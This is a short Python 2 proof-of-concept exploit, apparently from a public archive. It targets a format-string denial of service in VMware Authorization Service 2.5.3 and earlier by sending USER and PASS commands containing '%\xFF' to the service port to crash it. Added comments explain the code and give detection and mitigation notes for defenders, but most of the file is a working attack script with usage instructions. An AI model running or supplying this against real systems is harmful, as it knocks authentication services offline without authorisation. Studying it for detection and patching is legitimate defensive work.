# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 fully patched
# ----------------------------------------------------------------------------

# usage: C:\>exploit.py 127.0.0.1 912

import socket
import time
import sys

# Proof-of-concept flow: read the target from the command line, open one TCP
# connection, then send a USER and a PASS command whose argument is the two
# bytes 0x25 0xFF ('%' followed by 0xFF).
#
# NOTE(review): this is Python 2 syntax (print statements). The argv parsing
# sits outside the try block, so missing or non-numeric arguments raise an
# uncaught IndexError/ValueError rather than the generic message at the end.
#
# Defender notes:
#   - Detection: a USER or PASS line whose argument is a raw '%' followed by a
#     non-ASCII byte is not a plausible credential; logging or alerting on it
#     at the service port (912 in the usage example) identifies this probe.
#   - Mitigation: per the header, releases up to 2.5.3 are affected; confirm
#     the fixed release in the vendor advisory and limit which hosts can reach
#     the service port.
host = str(sys.argv[1])
port = int(sys.argv[2])

# Plain blocking TCP socket; no timeout is set and it is never closed explicitly.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    # connect() returns None, so `conn` is never used afterwards.
    conn = s.connect((host, port))
    # Read and show whatever the service sends first (up to 1024 bytes).
    d = s.recv(1024)
    print "Server <- " + d

    # '\x25' is '%'. The title calls this a format string issue, so presumably
    # the service passes this argument to a printf-style routine as the format
    # string -- inferred from the header, not visible in this script.
    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d

    # Same two-byte argument, this time on the PASS command.
    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        # Any exception from recv() (e.g. a reset connection) is reported as
        # success. NOTE(review): a peer that closes cleanly makes recv() return
        # an empty string instead of raising, so this message alone does not
        # confirm the service state; check the process and event logs on the
        # test host.
        print "\nExploit completed..."
except:
    # Bare except: every failure above (refused connection, socket error, even
    # KeyboardInterrupt) collapses into this one message and the real error is
    # discarded.
    print "Something goes wrong honey..."